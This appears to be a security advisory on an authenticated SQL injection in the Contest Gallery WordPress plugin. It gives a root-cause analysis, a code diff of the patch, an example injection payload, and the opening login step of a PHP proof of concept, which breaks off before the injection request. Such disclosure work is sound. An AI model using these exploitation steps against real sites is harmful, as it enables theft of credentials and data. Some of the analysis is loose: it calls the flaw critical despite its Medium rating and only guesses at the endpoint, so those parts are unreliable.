Published : June 29, 2026

CVE-2026-57662: Contest Gallery – Upload & Vote Photos, Media, Sell with PayPal & Stripe <= 30.0.0 Authenticated (Contributor+) SQL Injection PoC, Patch Analysis & Rule

CVE ID CVE-2026-57662

Plugin contest-gallery

Severity Medium (CVSS 6.5)

CWE 89

Vulnerable Version 30.0.0

Patched Version 30.0.1

Disclosed June 25, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-57662:
A critical SQL Injection vulnerability in the Contest Gallery plugin for WordPress, affecting versions up to and including 30.0.0. This flaw allows authenticated attackers with contributor-level access or higher to inject malicious SQL queries, potentially extracting sensitive database contents.

Root Cause:
The vulnerability resides in the SQL query construction within `cg-prepare-query-data.php`. The `cg1l_get_entry_query_data` function at line 7 directly interpolates the `$entryId` parameter into the SQL query string (“WHERE (id = $entryId …”) without proper parameterization. Similarly, `cg1l_build_images_query_data_gzip` at line 88 constructs SQL using string concatenation for `$getRecentIds` (“WHERE ($collected) …”) and directly uses `$gid` (“WHERE GalleryID = ‘$gid’ …”) at line 102. These parameters flow from user input via AJAX requests without sufficient sanitization or prepared statements.

Exploitation:
An attacker authenticates with contributor-level credentials and sends a POST request to `/wp-admin/admin-ajax.php` with the action parameter set to the vulnerable AJAX endpoint (likely `cg1l_ajax_frontend_get_data` or similar, as seen in `ajax-functions-frontend.php`). The attacker can manipulate parameters such as `entryId` or `gid` (or those corresponding to `$entryId` and `$gid`) to inject SQL payloads. For example, setting `entryId` to `’ OR 1=1 –` would break out of the SQL string context. The attacker could also exploit the `getRecentIds` array parameter to inject via the loop construction.

Patch Analysis:
The patch introduces proper parameterized queries using `$wpdb->prepare()` with `%d` placeholders for integer inputs throughout `cg-prepare-query-data.php`. Functions like `cg1l_get_entry_query_data` now use `$wpdb->prepare(“SELECT … WHERE id = %d …”, $entryId)`. The `cg1l_build_images_query_data_gzip` function uses `array_fill` to generate `%d` placeholders for the `IN` clause and passes the sanitized integer array to `$wpdb->prepare`. Additionally, the patch adds input validation early in many functions using `absint()` and empty checks, and integrates a hash-based access validation in `ajax-functions-frontend.php` to verify request authenticity.

Impact:
Successful exploitation allows an authenticated contributor-level attacker to execute arbitrary SQL queries against the WordPress database. This can lead to extraction of sensitive data such as user credentials, password hashes, session tokens, and private post content. In some configurations, it might enable privilege escalation or further compromise of the site. The CVSS score of 6.5 reflects the high confidentiality impact.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/contest-gallery/ajax/ajax-functions-frontend.php
+++ b/contest-gallery/ajax/ajax-functions-frontend.php
@@ -42,13 +42,23 @@
 			$galleriesIds = [];
 			$hasGalleriesIds = false;

-			if(!empty($_POST['cgIds'])){
-				$galleriesIds = [];
-				foreach ($_POST['cgIds'] as $idToSet){
-					$galleriesIds[] = intval($idToSet);
-				}
+			if(!empty($_POST['cgIds']) && is_array($_POST['cgIds'])){
+				$galleriesIds = cg1l_normalize_positive_int_id_list($_POST['cgIds']);
 				$hasGalleriesIds = true;
 			}
+			$hasGalleriesIds = (!empty($hasGalleriesIds) && !empty($galleriesIds));
+
+			$isGalleriesMainPage = false;
+			if(array_key_exists('isGalleriesMainPage', $_POST)){
+				$isGalleriesMainPage = cg1l_parse_bool_value($_POST['isGalleriesMainPage']);
+			}
+
+			if(array_key_exists('hasGalleriesIds', $_POST)){
+				$hasGalleriesIds = (
+					cg1l_parse_bool_value($_POST['hasGalleriesIds']) &&
+					!empty($galleriesIds)
+				);
+			}

 			$cgFromGalleriesUrl = '';
 			if(!empty($_POST['cg_from_galleries_url'])){
@@ -81,6 +91,21 @@
 				cg1l_ajax_frontend_response(false, ['message' => $galleryRequestErrorMessage, 'code' => 'cg_invalid_gallery_request']);
 			}

+			$galleriesDataAccessHash = (!empty($_POST['galleriesDataAccessHash'])) ? sanitize_text_field($_POST['galleriesDataAccessHash']) : '';
+			$viewerUserId = (is_user_logged_in()) ? get_current_user_id() : 0;
+			$expectedGalleriesDataAccessHash = cg1l_get_galleries_data_access_hash($shortcode_name,$viewerUserId,$isGalleriesMainPage,$galleriesIds,$hasGalleriesIds);
+			if(
+				empty($galleriesDataAccessHash) ||
+				empty($expectedGalleriesDataAccessHash) ||
+				!hash_equals((string)$expectedGalleriesDataAccessHash, (string)$galleriesDataAccessHash)
+			){
+				cg1l_ajax_frontend_response(false, ['message' => $galleryRequestErrorMessage, 'code' => 'cg_invalid_gallery_request']);
+			}
+
+			if($hasGalleriesIds && $requestedGalleryId !== 9999999 && !in_array($requestedGalleryId, $galleriesIds, true)){
+				cg1l_ajax_frontend_response(false, ['message' => $galleryRequestErrorMessage, 'code' => 'cg_invalid_gallery_request']);
+			}
+
 			$entryId = 0;

 			$frontend_gallery = '';
--- a/contest-gallery/functions/frontend/prepare/cg-prepare-comments-data.php
+++ b/contest-gallery/functions/frontend/prepare/cg-prepare-comments-data.php
@@ -1,6 +1,12 @@
 <?php
 if (!function_exists('cg1l_get_entry_comments_data')) {
     function cg1l_get_entry_comments_data($gid,$entryId) {
+        $gid = absint($gid);
+        $entryId = absint($entryId);
+        if(empty($gid) || empty($entryId)){
+            return [];
+        }
+
         $wp_upload_dir = wp_upload_dir();
         $jsonFile = $wp_upload_dir['basedir'] . '/contest-gallery/gallery-id-' . $gid . '/json/image-comments/image-comments-'.$entryId.'.json';
         if(file_exists($jsonFile)) {
@@ -185,4 +191,3 @@
         }
     }
 }
-
--- a/contest-gallery/functions/frontend/prepare/cg-prepare-data-for-frontend.php
+++ b/contest-gallery/functions/frontend/prepare/cg-prepare-data-for-frontend.php
@@ -435,11 +435,15 @@
         }

         $fieldMap = [
+            'thumbnail' => 'thumbnail',
             'WpUpload' => 'WpUpload',
             'post_title' => 'post_title',
             'post_name' => 'post_name',
             'post_content' => 'post_content',
             'post_excerpt' => 'post_excerpt',
+            'post_alt' => 'post_alt',
+            'post_caption' => 'post_caption',
+            'post_date' => 'post_date',
             'post_mime_type' => 'post_mime_type',
             'medium' => 'medium',
             'large' => 'large',
@@ -478,6 +482,7 @@

         $normalizedData = $fullData;
         $normalizedData['selectedOrder'] = $selectedOrder;
+        $normalizedData['MultipleFiles'] = $multipleFiles;

         if (empty($selectedFileData['isRealIdSource'])) {
             foreach ($fieldMap as $targetKey => $sourceKey) {
--- a/contest-gallery/functions/frontend/prepare/cg-prepare-image-data.php
+++ b/contest-gallery/functions/frontend/prepare/cg-prepare-image-data.php
@@ -2,6 +2,12 @@
 if (!function_exists('cg1l_get_entry_main_data')) {
     function cg1l_get_entry_main_data($gid,$entryId)
     {
+        $gid = absint($gid);
+        $entryId = absint($entryId);
+        if(empty($gid) || empty($entryId)){
+            return [];
+        }
+
         $wp_upload_dir = wp_upload_dir();

         $jsonFile = $wp_upload_dir['basedir'] . '/contest-gallery/gallery-id-' . $gid . '/json/image-data/image-data-'.$entryId.'.json';
--- a/contest-gallery/functions/frontend/prepare/cg-prepare-info-data.php
+++ b/contest-gallery/functions/frontend/prepare/cg-prepare-info-data.php
@@ -1,6 +1,12 @@
 <?php
 if (!function_exists('cg1l_get_entry_info_data')) {
     function cg1l_get_entry_info_data($gid,$entryId) {
+        $gid = absint($gid);
+        $entryId = absint($entryId);
+        if(empty($gid) || empty($entryId)){
+            return [];
+        }
+
         $wp_upload_dir = wp_upload_dir();
         $jsonFile = $wp_upload_dir['basedir'] . '/contest-gallery/gallery-id-' . $gid . '/json/image-info/image-info-'.$entryId.'.json';
         if(file_exists($jsonFile)) {
@@ -120,4 +126,3 @@
 }


-
--- a/contest-gallery/functions/frontend/prepare/cg-prepare-query-data.php
+++ b/contest-gallery/functions/frontend/prepare/cg-prepare-query-data.php
@@ -2,13 +2,20 @@
 if (!function_exists('cg1l_get_entry_query_data')) {
     function cg1l_get_entry_query_data($entryId)
     {
+        $entryId = absint($entryId);
+        if (empty($entryId)) {
+            return [];
+        }
+
         global $wpdb;
         $tablename = $wpdb->prefix . "contest_gal1ery";
-        $queryData = $wpdb->get_results(
+        $queryData = $wpdb->get_results($wpdb->prepare(
             "SELECT id, Exif, MultipleFiles
          FROM $tablename
-         WHERE (id = $entryId AND Active = '1' AND Exif != '' AND Exif != '0' AND Exif IS NOT NULL)
-            OR (id = $entryId AND Active = '1' AND MultipleFiles != '')");
+         WHERE id = %d AND Active = '1' AND ((Exif != '' AND Exif != '0' AND Exif IS NOT NULL)
+            OR MultipleFiles != '')",
+            $entryId
+        ));

         $queryDataArray = [];
         if (!empty($queryData)) {
@@ -33,6 +40,13 @@
 if (!function_exists('cg1l_build_images_query_data_gzip')) {
     function cg1l_build_images_query_data_gzip($gid, $getDataOnly = false, $getRecentIds = []) {

+        $gid = absint($gid);
+        if(!empty($getRecentIds) && is_array($getRecentIds)){
+            $getRecentIds = array_values(array_unique(array_filter(array_map('absint', $getRecentIds))));
+        }else{
+            $getRecentIds = [];
+        }
+
         $wp_upload_dir = wp_upload_dir();

         $base_dir = $wp_upload_dir['basedir'].'/contest-gallery/gallery-id-'.$gid.'/json/segments';
@@ -74,27 +88,24 @@
             $tablename = $wpdb->prefix . "contest_gal1ery";

             if(!empty($getRecentIds)){
-                $collected = '';
-                foreach($getRecentIds as $id) {
-                    if(!$collected){
-                        $collected .= "id = $id";
-                    }else{
-                        $collected .= " OR id = $id";
-                    }
-                }
+                $placeholders = implode(',', array_fill(0, count($getRecentIds), '%d'));
                 $queryData = $wpdb->get_results(
+                    $wpdb->prepare(
                     "SELECT id, Exif, MultipleFiles
          FROM $tablename
-         WHERE (($collected) AND Active = '1' AND Exif != '' AND Exif != '0' AND Exif IS NOT NULL)
-            OR (($collected) AND Active = '1' AND MultipleFiles != '')"
+         WHERE id IN ($placeholders) AND Active = '1' AND ((Exif != '' AND Exif != '0' AND Exif IS NOT NULL)
+            OR MultipleFiles != '')",
+                        $getRecentIds
+                    )
                 );
             }else{
-                $queryData = $wpdb->get_results(
+                $queryData = $wpdb->get_results($wpdb->prepare(
                     "SELECT id, Exif, MultipleFiles
          FROM $tablename
-         WHERE (GalleryID = '$gid' AND Active = '1' AND Exif != '' AND Exif != '0' AND Exif IS NOT NULL)
-            OR (GalleryID = '$gid' AND Active = '1' AND MultipleFiles != '')"
-                );
+         WHERE GalleryID = %d AND Active = '1' AND ((Exif != '' AND Exif != '0' AND Exif IS NOT NULL)
+            OR MultipleFiles != '')",
+                    $gid
+                ));
             }

             $queryDataArray = [];
@@ -160,4 +171,3 @@
         }
     }
 }
-
--- a/contest-gallery/functions/frontend/prepare/cg-prepare-stats-data.php
+++ b/contest-gallery/functions/frontend/prepare/cg-prepare-stats-data.php
@@ -1,6 +1,12 @@
 <?php
 if (!function_exists('cg1l_get_entry_stats_data')) {
     function cg1l_get_entry_stats_data($gid,$entryId) {
+        $gid = absint($gid);
+        $entryId = absint($entryId);
+        if(empty($gid) || empty($entryId)){
+            return [];
+        }
+
         $wp_upload_dir = wp_upload_dir();
         $jsonFile = $wp_upload_dir['basedir'] . '/contest-gallery/gallery-id-' . $gid . '/json/image-stats/image-stats-'.$entryId.'.json';

--- a/contest-gallery/functions/frontend/prepare/cg-prepare-urls-data.php
+++ b/contest-gallery/functions/frontend/prepare/cg-prepare-urls-data.php
@@ -12,6 +12,11 @@
 }
 if (!function_exists('cg1l_get_entry_urls_data')) {
     function cg1l_get_entry_urls_data($entryId,$recentMainData,$shortcode_name) {
+        $entryId = absint($entryId);
+        if(empty($entryId)){
+            return [];
+        }
+
         $map = cg1l_get_shortcode_entry_url_map();
         if(empty($map[$shortcode_name])){
             return $recentMainData;
--- a/contest-gallery/functions/general/cg-general-functions.php
+++ b/contest-gallery/functions/general/cg-general-functions.php
@@ -373,6 +373,9 @@
 		$name = preg_replace('/_+/', '_', $name);
         $name = cg_remove_emoji($name);
         return strtolower($name);// mysql statements are caseinsensitive by default*/
+        if(function_exists('cg1l_decode_nested_entities_for_plain_text')){
+	        $name = cg1l_decode_nested_entities_for_plain_text($name);
+        }
         $name = cg_remove_emoji( $name );
         return sanitize_title($name);
 	}
--- a/contest-gallery/functions/general/cg-get-version.php
+++ b/contest-gallery/functions/general/cg-get-version.php
@@ -17,7 +17,7 @@
 if(!function_exists('cg_get_version_for_scripts')){
     function cg_get_version_for_scripts () {
         /**###NORMAL###**/
-        return '30.0.0';
+        return '30.0.1';
         /**###NORMAL-END###**/
     }
 }
--- a/contest-gallery/functions/general/convert-values.php
+++ b/contest-gallery/functions/general/convert-values.php
@@ -115,6 +115,40 @@
     }
 }

+if(!function_exists('cg1l_decode_nested_entities_for_plain_text')){
+    function cg1l_decode_nested_entities_for_plain_text($content){
+        $content = cg1l_convert_mixed_value_to_string($content);
+
+        if($content===''){
+            return '';
+        }
+
+        $content = trim($content);
+        $content = str_replace(array('‍','‍','‍'), '', $content);
+        $content = str_replace(html_entity_decode('‍', ENT_QUOTES, 'UTF-8'), '', $content);
+
+        for($i=0;$i<3;$i++){
+            $decoded = html_entity_decode($content, ENT_QUOTES | ENT_HTML5, 'UTF-8');
+            if($decoded===$content){
+                break;
+            }
+            $content = $decoded;
+        }
+
+        if(function_exists('wp_strip_all_tags')){
+            $content = wp_strip_all_tags($content,true);
+        }else{
+            $content = strip_tags($content);
+        }
+
+        $content = preg_replace('/\\/', '', $content);
+        $content = preg_replace('/[x00-x1Fx7F]+/', ' ', $content);
+        $content = preg_replace('/s+/', ' ', $content);
+
+        return trim($content);
+    }
+}
+
 if(!function_exists('cg_stripslashes_recursively')){
     function cg_stripslashes_recursively ($content){
         if(!empty($content)){
--- a/contest-gallery/index.php
+++ b/contest-gallery/index.php
@@ -2,7 +2,7 @@
 /*
 Plugin Name: Contest Gallery
 Description: Upload form, files, photos and videos upload contest gallery plugin for WordPress. Create upload forms for entries with or without file/image upload. Create user registration form. Create login form. Create responsive galleries and allow to vote for any kind of entries. Sell entries via PayPal or Stripe API. Create or edit images via OpenAI API.
-Version: 30.0.0
+Version: 30.0.1
 Author: Contest Gallery
 Plugin URI: https://www.contest-gallery.com
 Author URI: https://www.contest-gallery.com
--- a/contest-gallery/shortcodes/cg_gallery.php
+++ b/contest-gallery/shortcodes/cg_gallery.php
@@ -17,12 +17,12 @@

 	    $galeryID = 0;
 	    if(!empty($atts['id'])){
-		    $galeryID = trim($atts['id']);
+		    $galeryID = absint($atts['id']);
 	    }

         $entryId = 0;
         if(!empty($atts['entry_id'])){
-            $entryId = $atts['entry_id'];
+            $entryId = absint($atts['entry_id']);
         }

         $frontend_gallery = '';
@@ -46,4 +46,4 @@

     }
 }
-?>
 No newline at end of file
+?>
--- a/contest-gallery/shortcodes/cg_gallery_ecommerce.php
+++ b/contest-gallery/shortcodes/cg_gallery_ecommerce.php
@@ -21,12 +21,12 @@

 	    $galeryID = 0;
 	    if(!empty($atts['id'])){
-		    $galeryID = trim($atts['id']);
+		    $galeryID = absint($atts['id']);
 	    }

         $entryId = 0;
         if(!empty($atts['entry_id'])){
-            $entryId = $atts['entry_id'];
+            $entryId = absint($atts['entry_id']);
         }

         $frontend_gallery = '';
@@ -54,4 +54,4 @@
     }
 }

-?>
 No newline at end of file
+?>
--- a/contest-gallery/shortcodes/cg_gallery_no_voting.php
+++ b/contest-gallery/shortcodes/cg_gallery_no_voting.php
@@ -19,12 +19,12 @@

 	    $galeryID = 0;
 	    if(!empty($atts['id'])){
-		    $galeryID = trim($atts['id']);
+		    $galeryID = absint($atts['id']);
 	    }

         $entryId = 0;
         if(!empty($atts['entry_id'])){
-            $entryId = $atts['entry_id'];
+            $entryId = absint($atts['entry_id']);
         }

         $frontend_gallery = '';
@@ -50,4 +50,4 @@
     }
 }

-?>
 No newline at end of file
+?>
--- a/contest-gallery/shortcodes/cg_gallery_user.php
+++ b/contest-gallery/shortcodes/cg_gallery_user.php
@@ -19,12 +19,12 @@

 	    $galeryID = 0;
 	    if(!empty($atts['id'])){
-		    $galeryID = trim($atts['id']);
+		    $galeryID = absint($atts['id']);
 	    }

         $entryId = 0;
         if(!empty($atts['entry_id'])){
-            $entryId = $atts['entry_id'];
+            $entryId = absint($atts['entry_id']);
         }

         $frontend_gallery = '';
@@ -50,4 +50,4 @@
     }
 }

-?>
 No newline at end of file
+?>
--- a/contest-gallery/shortcodes/cg_gallery_winner.php
+++ b/contest-gallery/shortcodes/cg_gallery_winner.php
@@ -19,12 +19,12 @@

 	    $galeryID = 0;
 	    if(!empty($atts['id'])){
-		    $galeryID = trim($atts['id']);
+		    $galeryID = absint($atts['id']);
 	    }

         $entryId = 0;
         if(!empty($atts['entry_id'])){
-            $entryId = $atts['entry_id'];
+            $entryId = absint($atts['entry_id']);
         }

         $frontend_gallery = '';
@@ -53,4 +53,4 @@
     }
 }

-?>
 No newline at end of file
+?>
--- a/contest-gallery/templates/landing.php
+++ b/contest-gallery/templates/landing.php
@@ -944,11 +944,59 @@
         echo $HeaderWpPageEntry;

     if(class_exists( 'QM_Plugin' )){
+        $wpScripts = wp_scripts();
+
+        $jqueryCoreSrc = includes_url('js/jquery/jquery.min.js');
+        $jqueryCoreVer = '';
+        if(!empty($wpScripts->registered['jquery-core'])){
+            $jqueryCore = $wpScripts->registered['jquery-core'];
+            $jqueryCoreVer = $jqueryCore->ver;
+            if(!empty($jqueryCore->src)){
+                $jqueryCoreSrc = $jqueryCore->src;
+                if(strpos($jqueryCoreSrc,'http://') !== 0 && strpos($jqueryCoreSrc,'https://') !== 0 && strpos($jqueryCoreSrc,'//') !== 0){
+                    $jqueryCoreSrc = (strpos($jqueryCoreSrc,'/') === 0) ? site_url($jqueryCoreSrc) : includes_url($jqueryCoreSrc);
+                }
+            }
+        }
+        if($jqueryCoreVer !== null && $jqueryCoreVer !== ''){
+            $jqueryCoreSrc = add_query_arg('ver',$jqueryCoreVer,$jqueryCoreSrc);
+        }
+
+        $jqueryMigrateSrc = includes_url('js/jquery/jquery-migrate.min.js');
+        $jqueryMigrateVer = '';
+        if(!empty($wpScripts->registered['jquery-migrate'])){
+            $jqueryMigrate = $wpScripts->registered['jquery-migrate'];
+            $jqueryMigrateVer = $jqueryMigrate->ver;
+            if(!empty($jqueryMigrate->src)){
+                $jqueryMigrateSrc = $jqueryMigrate->src;
+                if(strpos($jqueryMigrateSrc,'http://') !== 0 && strpos($jqueryMigrateSrc,'https://') !== 0 && strpos($jqueryMigrateSrc,'//') !== 0){
+                    $jqueryMigrateSrc = (strpos($jqueryMigrateSrc,'/') === 0) ? site_url($jqueryMigrateSrc) : includes_url($jqueryMigrateSrc);
+                }
+            }
+        }
+        if($jqueryMigrateVer !== null && $jqueryMigrateVer !== ''){
+            $jqueryMigrateSrc = add_query_arg('ver',$jqueryMigrateVer,$jqueryMigrateSrc);
+        }
+
+        $queryMonitorVersion = (defined('QM_VERSION')) ? QM_VERSION : '';
+        $queryMonitorCssSrc = plugins_url('assets/query-monitor.css', WP_PLUGIN_DIR . '/query-monitor/query-monitor.php');
+        $queryMonitorJsSrc = plugins_url('assets/query-monitor.js', WP_PLUGIN_DIR . '/query-monitor/query-monitor.php');
+        if(class_exists('QueryMonitor') && method_exists('QueryMonitor','init')){
+            $queryMonitor = QueryMonitor::init();
+            if(is_object($queryMonitor) && !empty($queryMonitor->file) && method_exists($queryMonitor,'plugin_url')){
+                $queryMonitorCssSrc = $queryMonitor->plugin_url('assets/query-monitor.css');
+                $queryMonitorJsSrc = $queryMonitor->plugin_url('assets/query-monitor.js');
+            }
+        }
+        if($queryMonitorVersion !== ''){
+            $queryMonitorCssSrc = add_query_arg('ver',$queryMonitorVersion,$queryMonitorCssSrc);
+            $queryMonitorJsSrc = add_query_arg('ver',$queryMonitorVersion,$queryMonitorJsSrc);
+        }
         ?>
-        <script type='text/javascript' src='<?php echo get_bloginfo('wpurl'); ?>/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'></script>
-        <script type='text/javascript' src='<?php echo get_bloginfo('wpurl'); ?>/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
-        <link rel='stylesheet' id='query-monitor-css' href='<?php echo get_bloginfo('wpurl'); ?>/wp-content/plugins/query-monitor/assets/query-monitor.css?ver=1673467028' type='text/css' media='all' />
-        <script type='text/javascript' src='<?php echo get_bloginfo('wpurl'); ?>/wp-content/plugins/query-monitor/assets/query-monitor.js?ver=1673467028' id='query-monitor-js'></script>
+        <script type='text/javascript' src='<?php echo esc_url($jqueryCoreSrc); ?>' id='jquery-core-js'></script>
+        <script type='text/javascript' src='<?php echo esc_url($jqueryMigrateSrc); ?>' id='jquery-migrate-js'></script>
+        <link rel='stylesheet' id='query-monitor-css' href='<?php echo esc_url($queryMonitorCssSrc); ?>' type='text/css' media='all' />
+        <script type='text/javascript' src='<?php echo esc_url($queryMonitorJsSrc); ?>' id='query-monitor-js'></script>
         <?php
     }
     ?>
--- a/contest-gallery/v10/v10-admin/gallery/gallery.php
+++ b/contest-gallery/v10/v10-admin/gallery/gallery.php
@@ -1191,7 +1191,7 @@
                 $PdfPreviewImage = $anotherFirstMultipleFilePdfPreviewImage;
             }
             echo '<a href="'.$sourceOriginalImgShow.'?time='.time().'" target="_blank" title="'.$title.'" alt="'.$title.'">
-                <div class="cg_backend_image cg_backend_image_stage"><img class="cg0degree cg_backend_image_preview" src="'.($PdfPreviewImage.'?time='.time()).'" alt="'.$title.'" ></div></a>';
+                <div class="cg0degree cg_backend_image cg_backend_image_stage"><img class="cg_backend_image_preview" src="'.($PdfPreviewImage.'?time='.time()).'" alt="'.$title.'" ></div></a>';
         }elseif(empty($allWpPostsByWpUploadIdArray[$WpUpload]) && $ImgTypeToShow!='con'){
 			echo '<div class="cg_backend_image_full_size_target_empty" >';
 			echo "</div>";
@@ -1250,7 +1250,7 @@
 			<?php
 		}else{
 			echo '<a href="'.$sourceOriginalImgShow.'?time='.time().'" target="_blank" title="Show full size" alt="Show full size">
-                <div class="cg_backend_image cg_backend_image_stage"><img class="cg'.$rThumbToShow.'degree cg_backend_image_preview" src="'.($imgSrcLargeToShow.'?time='.time()).'" width="'.absint($imgSrcFullWidth).'" height="'.absint($imgSrcFullHeight).'" alt="Show full size" ></div></a>';
+                <div class="cg'.$rThumbToShow.'degree cg_backend_image" style="background: url('.($imgSrcLargeToShow.'?time='.time()).') center center no-repeat;"></div></a>';
 		}
 		echo "</div>";

--- a/contest-gallery/v10/v10-admin/gallery/show-comments.php
+++ b/contest-gallery/v10/v10-admin/gallery/show-comments.php
@@ -445,7 +445,7 @@
 	                <?php
                 }else{
                 echo '<div id="cgVotesImageVisualContent">';
-                echo '<a href="'.$sourceOriginalImgShow.'" target="_blank" title="Show full size"><img class="cg'.$rThumb.'degree" src="'.$imageThumb.'" style="'.$padding.';position: absolute !important;max-width:none !important;" width="'.$WidthThumbPic.'"></a>';
+                echo '<a href="'.$sourceOriginalImgShow.'" target="_blank" title="Show full size"><div class="cg'.$rThumb.'degree cg_backend_image" style="background: url('.$imageThumb.') center center no-repeat;"></div></a>';
                 //echo '<a href="'.$sourceOriginalImgShow.'" target="_blank" title="Show full size" alt="Show full size"><img src="'.$WPdestination.$value->Timestamp.'_'.$value->NamePic.'-300width.'.$value->ImgType.'" style="'.$padding.';position: absolute !important;max-width:none !important;" width="'.$WidthThumbPic.'"></a>';
                 echo "</div>";
                 }
--- a/contest-gallery/v10/v10-admin/gallery/sort-gallery-files.php
+++ b/contest-gallery/v10/v10-admin/gallery/sort-gallery-files.php
@@ -183,7 +183,7 @@
         echo "<div class='cg_backend_image_full_size_target_container'>";
         //echo $galleryFile['id'];
         echo '<div class="cg_backend_image_full_size_target_container_drag"></div>';
-        echo '<div class="cg_backend_image_full_size_target"><div class="cg_backend_image cg_backend_image_stage"><img class="cg'.$galleryFile['rThumb'].'degree cg_backend_image_preview" src="'.$wp_upload_dir['baseurl'].$galleryFile['large'].'"'.$imageWidthAttribute.$imageHeightAttribute.' alt="" ></div></div>';
+        echo '<div class="cg_backend_image_full_size_target"><div class="cg'.$galleryFile['rThumb'].'degree cg_backend_image" style="background: url('.$wp_upload_dir['baseurl'].$galleryFile['large'].') center center no-repeat;"></div></div>';
         echo "<input type='hidden' class='cg_position' data-cg-real-id=".$galleryFile['id']."  name='cg_position[".$galleryFile['id']."]' value='$order' >";
         echo "</div>";
     }else{
--- a/contest-gallery/v10/v10-admin/votes/show-votes.php
+++ b/contest-gallery/v10/v10-admin/votes/show-votes.php
@@ -320,7 +320,7 @@
             echo '</a>';
         }elseif(cg_is_is_image($ImgType)){
             echo '<div id="cgVotesImageVisualContent">';
-                echo '<a href="'.$sourceOriginalImgShow.'" target="_blank" title="Show full size"><div class="cg_backend_image cg_backend_image_stage"><img class="cg_backend_image_preview cg'.$rThumb.'degree" src="'.$imageThumb.'" alt="Show full size"></div></a>';
+                echo '<a href="'.$sourceOriginalImgShow.'" target="_blank" title="Show full size"><div class="cg'.$rThumb.'degree cg_backend_image" style="background: url('.$imageThumb.') center center no-repeat;"></div></a>';
             echo "</div>";
         }elseif($ImgType=='ytb'){
 	        echo '<div id="cgVotesImageVisualContent">';
--- a/contest-gallery/v10/v10-frontend/gallery-view.php
+++ b/contest-gallery/v10/v10-frontend/gallery-view.php
@@ -381,12 +381,27 @@
                 '.$cg_gallery_info.'
               </figure>';
         }elseif(cg_is_is_image($ImgType)){
+            if($rThumb === ' cg90degree' || $rThumb === ' cg270degree'){
+                $rotatedContainerRatioWidth = ($naturalHeight > 0) ? $naturalHeight : 1;
+                $rotatedContainerRatioHeight = ($naturalWidth > 0) ? $naturalWidth : 1;
+                $rotatedImageWidthPercent = ($naturalHeight > 0) ? round(($naturalWidth / $naturalHeight) * 100, 4) : 100;
+                $rotatedImageHeightPercent = ($naturalWidth > 0) ? round(($naturalHeight / $naturalWidth) * 100, 4) : 100;
+                $imageContent = '<div class="cg_append_container cg_rotated_image_container" style="width:100%; aspect-ratio: '.(int)$rotatedContainerRatioWidth.' / '.(int)$rotatedContainerRatioHeight.'; overflow:hidden;">
+                    <div
+                        role="img"
+                        aria-label="'.esc_attr($altAttr).'"
+                        class="cg_append cg_rotated_image_background skip-lazy'.$rThumb.'"
+                        itemprop="contentUrl"
+                        style="background: url('.esc_url($imgSrcLarge).') center center no-repeat; background-size: contain !important; width:'.$rotatedImageWidthPercent.'%; height:'.$rotatedImageHeightPercent.'%;" ></div>
+                </div>';
+            }else{
             $imageContent = '<img
                     src="'.$imgSrcLarge.'" '.$WidthAttribute.' '.$HeightAttribute.'
                     alt="'.esc_attr($altAttr).'"
                     loading="lazy"
                     class="'.$rThumb.'"
                     itemprop="contentUrl" '.$imgStyle.' >';
+            }
             $figure = '<figure class="cg_figure" itemscope itemtype="https://schema.org/'.$itemTypeObject.'Object">
                 '.$meta.'
                 '.$metaComment.'
--- a/contest-gallery/v10/v10-frontend/user_upload/users-upload-check.php
+++ b/contest-gallery/v10/v10-frontend/user_upload/users-upload-check.php
@@ -1443,6 +1443,15 @@
                 }

                 $post_title_to_insert = (($WpPageTitle) ? $WpPageTitle : $post_title);
+                if(function_exists('cg1l_decode_nested_entities_for_plain_text')){
+                    $post_title_to_insert = cg1l_decode_nested_entities_for_plain_text($post_title_to_insert);
+                    if(empty($post_title_to_insert)){
+                        $post_title_to_insert = cg1l_decode_nested_entities_for_plain_text($post_title);
+                    }
+                }
+                if(empty($post_title_to_insert)){
+                    $post_title_to_insert = 'entry';
+                }
                 $post_title_to_insert = substr($post_title_to_insert,0,100);

                 if(!empty($selectSQL1->WpPageParent)){
--- a/contest-gallery/v10/v10-frontend/v10-get-data.php
+++ b/contest-gallery/v10/v10-frontend/v10-get-data.php
@@ -127,6 +127,7 @@
 if(!isset($entryId)){
     $entryId = 0;
 }
+$entryId = absint($entryId);

 if(empty($isFromOrderSummary)){// to go sure is initiated
 	$isFromOrderSummary = false;

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-57662 - Contest Gallery SQL Injection (Authenticated)

$target_url = 'http://example.com'; // CHANGE THIS to target WordPress URL
$username = 'contributor_user'; // CHANGE THIS to contributor-level username
$password = 'user_password'; // CHANGE THIS to user's password

// Step 1: Authenticate and get cookies
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($username) . '&pwd=' . urlencode($password) . '&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
curl_close($ch);

